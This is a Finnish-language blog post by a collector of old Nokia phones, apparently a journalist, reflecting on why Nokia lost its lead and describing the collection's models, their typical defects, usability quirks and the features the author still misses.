Mutta kun kyseessä oli matkapuhelinyhtiö se ei nähnyt, mihin kehitys oli menossa. Luurien sijaan tärkeäksi nousivat sovellukset ja palvelut. Niissä Nokian Ovi-viritys oli kerrassaan surkea eikä toiminut kunnolla valtavassa laitevalikoimassa. Olisi pitänyt nähdä, sillä Nokia itse laneerasi ajatuksen älypuhelimesta ja puhelimesta tietoyhteiskunnan palvelujen päätelaitteena.

Nokia ei nähnyt edes laitepuolen tulevaa kehitystä. "Jossain vaiheessa ihmiset tajuavat, että erittäin suurella näytöllä varustettu puhelin on yksinkertaisesti tyhmä asia", sanoi Nokian matkapuhelinjohtaja Niklas Savander vuonna 2012. 

Huippuvuosista alkaa olla niin pitkä aika, etteivät nuoret tiedä ajasta, jolloin Symbian oli aikansa iPhone ja Nokia aikansa Apple, ihailtu ja kunnioitettu globaali markkinajohtaja. Toimittajat ympäri maailman lensivät Suomeen katsomaan maata, jossa lapsillakin oli oma puhelin ja jossa ostoksia saattoi maksaa automaatista tekstiviesteillä.

Olen kerännyt Nokian klassisia puhelimia ymmärtääkseni paremmin, mikä Nokiassa meni pieleen, ja säilyttääkseni jälkipolville tämän uskomattoman ajan Suomen teollisuuden historiassa.

Nokian ja muidenkin puhelimia.

Alemmalla hyllyllä on vasemmalla pino Lumia-malleja, Apple iPhone 2, 3 ja 4, Jollan ensimmäinen malli sekä oikeassa reunassa MyOrigo ja Nokian Vertu-replika. 

Toisella hyllyllä ovat mm. Communicatorit ja vanhimmat käsipuhelimet.

Lisää Nokiaa.

Olen kerännyt vain tärkeimmät mallit ja jättänyt suosiolla vanhat peruspuhelimet pois. Varsinkin 2000-luvun ensimmäisinä vuosina Nokia julkaisi suorastaan ällistyttävän määrän puhelimia. 

Voi vain ihailla sitä rohkeuden ja innovoinnin määrää, joka näihin puhelimiin on mennyt. Osa ideoista oli suorastaan hulluja, kuten "huulipunamallit", pyöreä numeronäppäimistö ja erikoisesti muotoiltu 7600, missä näppäimet olivat näytön ympärillä. Mutta silloin Nokialla oli varaa ja halua kokeilla.

Keräilyssä olen huomannut, että vaikka Nokiaa pidettiin helppokäyttöisinä ja kestävinä, älypuhelimet olivat usein kaikkea muuta. Joissakin malleissa on tyyppivikoja, joiden vuoksi ehjiä yksilöitä on liki mahdotonta löytää. 3650-puhelinten näppäimistä lähtee valkoinen väri, 9300 Communicatorin nurkat kuluvat puhki ja N95:n takakannen kiinnitys rikkoutuu helposti. 

Osa puhelimista on täysin kuolleita, eikä edes uusi akku tai suora kytkentä virtalähteeseen saa niitä heräämään. Ilmeisesti piirilevyn elektroniikka on pettänyt. N95 sai jo tuoreeltaan kritiikkiä kotimaan lehdistössä. Vikoja oli myös softassa. N97 julkaistiin niin bugisena, että se vahingoitti yhtiön mainetta vielä pitkään, eikä päivitetty N97 mini ollut juuri parempi.

Käytettävyys onnistui välillä, toisinaan taas ei. Virtakytkintä saa etsiä, samoin sim-kortin paikka vaihtui joka mallissa. 7650-mallista en löytänyt sim-paikkaa ennen kuin etsin netistä sen käyttöohjeen. 

Ehkä tuotekehityksen ongelmien, ehkä kaupallisten syiden vuoksi Nokia rampautti puhelimia omilla valinnoillaan. Communicatoreissa ei ollut kameraa eikä kaikissa edes wifiä, 6210 Navigator-mallissa oli gps mutta ei wifiä. Vuonna 2006 julkistettu XpressMusic-mallissa oli vain 2G-yhteys, ei 3G:tä eikä wifiä. Nokia halusi suojella operaattoriasiakkaitaan ja vähätteli pitkään tarkoituksella langattoman lähiverkon merkitystä.

Entinen nokialainen kertoi viestissään, miten yhtiö halusi säästää tekniikan kuluissa, jotta kate maksimoitiin. Puhelimiin käytettiin vanhoja cpu- ja gpu-piirejä, jolloin työaika kului softan optimointiin. Itse softaa ei arvostettu, eri alustoille jouduttiin kehittämään rinnakkaisia sovelluksia, mikä söi tuotekehityksen resursseja ja johti yhteensopivuusongelmiin. 

Jossain vaiheessa Nokia omaksui erikoisen käytännön: se alkoi piilottaa puhelinten tyyppimerkintöjä. Tämän seurauksena nettikirppiksillä myydään puhelimia väärillä numeroilla. Joskus tyypin selvittäminen vaatii salapoliisityötä. Akun alta löytyvä RM-numero auttaa googlaamaan, mistä mallista oikein on kyse.

Nokialaisissa oli myös ominaisuuksia, joita kaipaa yhä vieläkin: erillinen kamerapainike, linssin eteen siirtyvä suojaläppä, mahdollisuus puhelun nauhoittamiseen (varoituspiippauksen kera) ja oikea näppäimistö, joka kääntyi esiin näytön alta. Varsinkin E7 on tästä syystä suosikkini. Communicator-malleilla olisi vieläkin kysyntää, jos jokin valmistaja tekisi ajanmukaisen Android-laitteen samalla idealla. Jarkko Sipilä kertoi kirjoittaneensa 9210 Communicatorilla jopa novellin. "Ei tarvinnut paljoa edes käsitellä, kun naputtelu oli niin hidasta. Syntyi heti hyvää tekstiä", hän kommentoi.

Seuraavassa postauksessa kuvia ja muistoja Nokian legendaarisista malleista.